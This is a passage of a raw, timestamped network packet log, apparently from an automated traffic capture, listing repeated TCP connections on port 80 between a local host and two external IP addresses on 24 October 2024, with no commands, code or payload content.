                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320065975 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320326090 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320380926 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320430994 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.365461111 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.427988052 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.447575092 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.453114033 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.453200102 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.466129065 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:19.471857071 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660245895 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660281897 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660347939 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660372972 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660383940 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660396099 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660417080 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660480022 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660501957 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660521030 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660530090 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660553932 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660567045 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660581112 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660618067 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666141987 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666191101 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666213989 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666230917 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666239023 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666287899 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874408960 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874433041 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874488115 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874512911 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874537945 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874562025 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874572039 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874589920 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874604940 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874633074 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874928951 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.874978065 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875026941 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875049114 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875086069 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875329018 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875390053 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875416994 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875432014 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875433922 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875474930 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875983953 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.875998974 CEST8049992118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.876044989 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.974900007 CEST4999280192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:21.993287086 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:21.998941898 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:21.999245882 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:22.009376049 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:22.014811039 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:22.014971018 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198098898 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198165894 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198184967 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198210001 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198235035 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198270082 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198286057 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198327065 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198344946 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198355913 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198376894 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198395014 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198405027 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198467016 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203850985 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203888893 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203913927 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203933954 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203953981 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.204783916 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422677040 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422729015 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422770977 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422820091 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422859907 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.422893047 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423002005 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423125982 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423243999 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423280001 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423336029 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423372984 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423402071 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.423494101 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424067974 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424148083 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424180984 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424216032 CEST8049993118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424221992 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.424308062 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.521871090 CEST4999380192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.541877985 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.547472000 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.547676086 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.558223963 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.564671993 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763803959 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763853073 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763912916 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763948917 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763978958 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764010906 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764031887 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764051914 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764070034 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764120102 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764174938 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764267921 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764303923 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764357090 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771301031 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771378994 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771419048 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771436930 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771471977 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771507978 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771541119 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771569967 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771610975 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990695000 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990751982 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990825891 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990856886 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990870953 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990914106 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990947962 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991046906 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991094112 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991266966 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991353035 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991389990 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991395950 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992074966 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992129087 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992134094 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992171049 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992221117 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992407084 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992468119 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992506981 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992515087 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.993392944 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.993463993 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107760906 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107839108 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107876062 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107888937 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107912064 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107966900 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107992887 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108007908 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108056068 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108243942 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108292103 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108344078 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108704090 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108762980 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108800888 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108815908 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108839989 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108891964 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150583029 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150638103 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150686979 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150687933 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.193412066 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219250917 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219398022 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219499111 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224824905 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224900961 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224931955 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224966049 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224991083 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225001097 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225017071 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225038052 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225076914 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225092888 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225173950 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225217104 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225231886 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225266933 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225307941 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225986958 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.226033926 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.226083040 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267618895 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267678976 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267715931 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267731905 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267755985 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267882109 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336225033 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336270094 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336605072 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341603994 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341653109 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341691017 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341727018 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341767073 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341773033 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341804981 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342020035 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342058897 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342075109 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342097044 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342133045 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342144966 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342753887 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.342808008 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384578943 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384603024 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384619951 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384637117 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384740114 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384906054 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.384984970 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.427824974 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.452909946 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.453012943 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.453044891 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.453071117 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.453077078 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.453164101 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.456813097 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.462764978 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.483870983 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.489523888 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.489676952 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.500427961 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.506949902 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:32.119287968 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:32.121083021 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:33.005996943 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:33.011708021 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.024934053 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.030720949 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.030982971 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.042968035 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.048444033 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.660661936 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.660846949 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:35.552963018 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:35.558784008 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.572449923 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.578032017 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.578114986 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.592191935 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.597657919 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.597737074 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:37.198024035 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:37.198127985 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:38.099793911 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:38.105416059 CEST80499973.33.130.190192.168.2.5
